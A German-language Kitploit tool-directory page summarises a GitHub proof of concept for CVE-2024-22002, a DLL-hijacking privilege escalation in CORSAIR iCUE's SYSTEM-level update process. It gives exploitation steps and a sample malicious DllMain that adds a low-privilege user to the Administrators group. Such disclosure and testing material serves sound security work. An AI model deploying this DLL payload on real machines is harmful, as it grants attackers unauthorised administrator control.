Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

Proof-of-concept für eine lokale Privilegienausweitungs-Schwachstelle (CVE-2024-22002) in CORSAIR iCUE v5.9.105 durch DLL-Hijacking während des Update-Prozesses, die es unprivilegierten Benutzern ermöglicht, SYSTEM-Rechte zu erlangen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Anfällige Software und Version

  • Software-Download-Link: CORSAIR iCUE v5.9.105 mit iCUE Murals

Beschreibung

Eine DLL-Hijacking-Schwachstelle wurde in iCUE v5.9.105 identifiziert. Diese Schwachstelle tritt während des Update-Prozesses auf, der vom Dienst "iCUEUpdateService" verwaltet wird. Der Dienst startet einen Prozess ("cuepkg.exe"), der für die Durchführung des Updates verantwortlich ist und mit "NT AUTHORITY\SYSTEM"-Berechtigungen läuft. Beim Starten des Prozesses sucht er in verschiedenen DLLs im Verzeichnis \cuepkg-1.2.6, das sich im iCUE-Installationsverzeichnis befindet. Einige dieser DLLs sind standardmäßig nicht vorhanden, aber da ein normaler Benutzer die Berechtigung hat, Dateien in diesem Verzeichnis zu erstellen, könnte ein Angreifer möglicherweise eine schädliche DLL in das Verzeichnis einbringen. Folglich würde diese schädliche DLL von cuepkg.exe mit Administratorrechten geladen werden.

Die erkannten betroffenen DLLs sind:

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

CVSS-Vektor: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • Basis-Score: 7,8 (Hoch)
  • Zeitlicher Score: 7,8 (Hoch)
  • Umgebungs-Score: 7,8 (Hoch)

PoC

Als Beispiel wird die DLL profapi.dll verwendet.

  1. Erstellen Sie unsere schädliche DLL und fügen Sie sie zum Verzeichnis %INSTALLDIR%cuepkg-1.2.6 hinzu.
  2. Warten Sie, bis das Programm automatisch aktualisiert wird, oder erzwingen Sie in diesem Fall das Update durch Klicken auf "Nach Updates suchen".
  3. Unser Benutzer ohne Administratorrechte wird zur Gruppe hinzugefügt.

Berechtigungen des Benutzers lowpriv vor der Ausführung der schädlichen DLL: lowpriv_cmd

Berechtigungen des Benutzers lowpriv nach der Ausführung der schädlichen DLL: lowpriv_cmd_adm

  • Beispielhafter schädlicher Code:
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
Tool herunterladen